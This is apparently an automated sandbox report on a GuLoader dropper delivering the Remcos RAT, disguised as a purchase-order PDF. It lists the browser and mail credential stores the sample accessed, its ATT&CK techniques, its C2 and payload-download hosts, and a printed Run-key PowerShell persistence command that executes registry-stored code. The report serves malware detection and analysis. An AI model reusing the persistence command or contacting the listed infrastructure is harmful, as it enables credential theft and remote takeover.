              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,14_2_004082CD
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeCode function: 0_2_00403312 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403312
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3515260679.000000000078E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3519866024.00000000083BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 356, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword14_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword14_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword14_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 356, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2136, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-HP1D61Jump to behavior
              Source: Yara matchFile source: 00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3515260679.000000000078E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3519866024.00000000083BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 356, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts11
              Native API
              1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts12
              Command and Scripting Interpreter
              Logon Script (Windows)212
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              4
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell
              Login Hook1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              1
              Credentials In Files
              129
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets241
              Security Software Discovery
              SSH2
              Clipboard Data
              2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Modify Registry
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture112
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
              Virtualization/Sandbox Evasion
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501073 Sample: P.O_Qouts_t87E90Y-E4R7G-PDF.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 51 z194668-ex70k.ps02.zwhhosting.com 2->51 53 geoplugin.net 2->53 55 Multi AV Scanner detection for domain / URL 2->55 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 13 other signatures 2->61 10 P.O_Qouts_t87E90Y-E4R7G-PDF.exe 29 2->10         started        signatures3 process4 file5 39 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 10->39 dropped 13 powershell.exe 20 10->13         started        process6 file7 41 C:\Users\...\P.O_Qouts_t87E90Y-E4R7G-PDF.exe, PE32 13->41 dropped 43 P.O_Qouts_t87E90Y-...exe:Zone.Identifier, ASCII 13->43 dropped 77 Writes to foreign memory regions 13->77 79 Found suspicious powershell code related to unpacking or dynamic code loading 13->79 81 Powershell drops PE file 13->81 17 wab.exe 5 16 13->17         started        22 conhost.exe 13->22         started        signatures8 process9 dnsIp10 45 45.95.169.18, 2404, 49740, 49741 GIGANET-HUGigaNetInternetServiceProviderCoHU Croatia (LOCAL Name: Hrvatska) 17->45 47 z194668-ex70k.ps02.zwhhosting.com 118.27.130.234, 49738, 80 GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG Singapore 17->47 49 geoplugin.net 178.237.33.50, 49743, 80 ATOM86-ASATOM86NL Netherlands 17->49 37 C:\ProgramData\remcos\logs.dat, data 17->37 dropped 63 Detected Remcos RAT 17->63 65 Tries to harvest and steal browser information (history, passwords, etc) 17->65 67 Maps a DLL or memory area into another process 17->67 69 Installs a global keyboard hook 17->69 24 wab.exe 1 17->24         started        27 wab.exe 1 17->27         started        29 wab.exe 14 17->29         started        31 cmd.exe 1 17->31         started        file11 signatures12 process13 signatures14 71 Tries to steal Instant Messenger accounts or passwords 24->71 73 Tries to harvest and steal browser information (history, passwords, etc) 24->73 75 Tries to steal Mail credentials (via file / registry access) 27->75 33 conhost.exe 31->33         started        35 reg.exe 1 1 31->35         started        process15

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              P.O_Qouts_t87E90Y-E4R7G-PDF.exe50%ReversingLabsWin32.Trojan.Guloader
              P.O_Qouts_t87E90Y-E4R7G-PDF.exe45%VirustotalBrowse
              P.O_Qouts_t87E90Y-E4R7G-PDF.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility\P.O_Qouts_t87E90Y-E4R7G-PDF.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\nsw96B9.tmp\nsDialogs.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsw96B9.tmp\nsDialogs.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility\P.O_Qouts_t87E90Y-E4R7G-PDF.exe50%ReversingLabsWin32.Trojan.Generic
              C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility\P.O_Qouts_t87E90Y-E4R7G-PDF.exe45%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              z194668-ex70k.ps02.zwhhosting.com3%VirustotalBrowse
              geoplugin.net1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://www.imvu.comr0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://www.imvu.com0%URL Reputationsafe
              http://www.imvu.com0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://login.yahoo.com/config/login0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
              http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
              45.95.169.180%Avira URL Cloudsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
              http://z194668-ex70k.ps02.zwhhosting.com/PFaQcsFKEopza178.binQ0%Avira URL Cloudsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              http://crl.microsoftJc0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpl0%VirustotalBrowse
              http://www.nirsoft.net0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              45.95.169.1810%VirustotalBrowse
              http://z194668-ex70k.ps02.zwhhosting.com/PFaQcsFKEopza178.binI0%Avira URL Cloudsafe
              https://www.google.com0%Avira URL Cloudsafe
              https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
              https://github.com/Pester/Pester1%VirustotalBrowse
              http://z194668-ex70k.ps02.zwhhosting.com/PFaQcsFKEopza178.bin0%Avira URL Cloudsafe
              http://www.nirsoft.net0%VirustotalBrowse
              https://www.google.com0%VirustotalBrowse
              http://www.nirsoft.net/0%Avira URL Cloudsafe
              http://www.imvu.comata0%Avira URL Cloudsafe
              https://www.google.com/accounts/servicelogin0%VirustotalBrowse
              http://z194668-ex70k.ps02.zwhhosting.com/PFaQcsFKEopza178.bin7%VirustotalBrowse
              http://www.nirsoft.net/0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              z194668-ex70k.ps02.zwhhosting.com
              118.27.130.234
              truefalseunknown
              geoplugin.net
              178.237.33.50
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              45.95.169.18true
              • 10%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://geoplugin.net/json.gpfalse
              • URL Reputation: safe
              unknown
              http://z194668-ex70k.ps02.zwhhosting.com/PFaQcsFKEopza178.binfalse
              • 7%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.3163090245.0000000006187000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.imvu.comrwab.exe, 00000009.00000002.3531510152.0000000023D90000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.3160896387.0000000005276000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://geoplugin.net/json.gplwab.exe, 00000009.00000002.3519866024.00000000083BC000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://crl.microsoftpowershell.exe, 00000002.00000002.3164302379.0000000007938000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.3160896387.0000000005276000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/Licensepowershell.exe, 00000002.00000002.3163090245.0000000006187000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.imvu.comwab.exe, wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.3211794980.00000000007BD000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://contoso.com/Iconpowershell.exe, 00000002.00000002.3163090245.0000000006187000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://z194668-ex70k.ps02.zwhhosting.com/PFaQcsFKEopza178.binQwab.exe, 00000009.00000002.3519866024.000000000836A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.microsoftJcpowershell.exe, 00000002.00000002.3164302379.0000000007938000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.nirsoft.netwab.exe, 0000000D.00000002.3223718657.00000000009E4000.00000004.00000010.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://nsis.sf.net/NSIS_ErrorErrorP.O_Qouts_t87E90Y-E4R7G-PDF.exe, P.O_Qouts_t87E90Y-E4R7G-PDF.exe.2.drfalse
              • URL Reputation: safe
              unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.3160896387.0000000005276000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000009.00000002.3531510152.0000000023D90000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://z194668-ex70k.ps02.zwhhosting.com/PFaQcsFKEopza178.binIwab.exe, 00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.google.comwab.exe, wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://nsis.sf.net/NSIS_ErrorP.O_Qouts_t87E90Y-E4R7G-PDF.exe, P.O_Qouts_t87E90Y-E4R7G-PDF.exe.2.drfalse
              • URL Reputation: safe
              unknown
              https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.3160896387.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/powershell.exe, 00000002.00000002.3163090245.0000000006187000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.3163090245.0000000006187000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.google.com/accounts/serviceloginwab.exefalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://login.yahoo.com/config/loginwab.exefalse
              • URL Reputation: safe
              unknown
              http://www.nirsoft.net/wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://www.imvu.comatawab.exe, 0000000F.00000002.3211794980.00000000007BD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.3160896387.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.ebuddy.comwab.exe, wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              118.27.130.234
              z194668-ex70k.ps02.zwhhosting.comSingapore
              135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGfalse
              178.237.33.50
              geoplugin.netNetherlands
              8455ATOM86-ASATOM86NLfalse
              45.95.169.18
              unknownCroatia (LOCAL Name: Hrvatska)
              42864GIGANET-HUGigaNetInternetServiceProviderCoHUtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1501073
              Start date and time:2024-08-29 12:01:11 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 8m 6s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:16
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:P.O_Qouts_t87E90Y-E4R7G-PDF.exe
              Detection:MAL
              Classification:mal100.phis.troj.spyw.evad.winEXE@17/16@4/3
              EGA Information:
              • Successful, ratio: 83.3%
              HCA Information:
              • Successful, ratio: 98%
              • Number of executed functions: 216
              • Number of non-executed functions: 237
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
              • Excluded IPs from analysis (whitelisted): 40.126.28.12, 40.126.28.13, 40.126.28.23, 20.190.135.2, 40.126.7.35, 40.126.28.14, 40.126.28.18, 40.126.28.20
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
              • Execution Graph export aborted for target powershell.exe, PID 2292 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              06:02:26API Interceptor37x Sleep call for process: powershell.exe modified
              06:04:26API Interceptor7x Sleep call for process: wab.exe modified
              12:03:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)
              12:03:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              118.27.130.234Qoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • z194668-ex70k.ps02.zwhhosting.com/GNqBmktuMIuytyf140.bin
              Qoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • z194668-ex70k.ps02.zwhhosting.com/GNqBmktuMIuytyf140.bin
              178.237.33.50SecuriteInfo.com.Exploit.CVE-2017-11882.123.24787.2174.rtfGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              PMT-INV0230824AUG.xla.xlsxGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              French Group.jsGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              ORDER 5172024.xla.xlsxGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              pop.vbsGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
              • geoplugin.net/json.gp
              August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              geoplugin.netSecuriteInfo.com.Exploit.CVE-2017-11882.123.24787.2174.rtfGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              PMT-INV0230824AUG.xla.xlsxGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              French Group.jsGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              ORDER 5172024.xla.xlsxGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              pop.vbsGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
              • 178.237.33.50
              August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              z194668-ex70k.ps02.zwhhosting.comQoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 118.27.130.234
              Qoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 118.27.130.234
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGPayment-Details.scr.exeGet hashmaliciousAgentTeslaBrowse
              • 163.44.198.71
              Qoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 118.27.130.234
              Qoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 118.27.130.234
              https://cpanel12wh.bkk1.cloud.z.com/~cp318430/app/browser/info/billing2.php/Get hashmaliciousUnknownBrowse
              • 163.44.198.61
              https://dub.sh/nL4qBGQGet hashmaliciousUnknownBrowse
              • 150.95.31.161
              Outward Remittance_Payment Receipt.exeGet hashmaliciousAgentTeslaBrowse
              • 163.44.198.71
              http://coffeeroasting.co.th/Get hashmaliciousUnknownBrowse
              • 163.44.198.45
              SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
              • 163.44.198.71
              US00061Q0904081THBKK.exeGet hashmaliciousAgentTeslaBrowse
              • 163.44.198.71
              http://46814880-10-20181030130048.webstarterz.com/tedsplay.com/onlinebankingmtb/securityauthentication.html?onlinebanking.mtb.com/Login/MTBSignOn?security+authenticationGet hashmaliciousUnknownBrowse
              • 163.44.198.51
              ATOM86-ASATOM86NLSecuriteInfo.com.Exploit.CVE-2017-11882.123.24787.2174.rtfGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              PMT-INV0230824AUG.xla.xlsxGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              French Group.jsGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              ORDER 5172024.xla.xlsxGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              pop.vbsGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
              • 178.237.33.50
              August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              GIGANET-HUGigaNetInternetServiceProviderCoHU7GfciIf7ys.exeGet hashmaliciousUnknownBrowse
              • 45.95.169.223
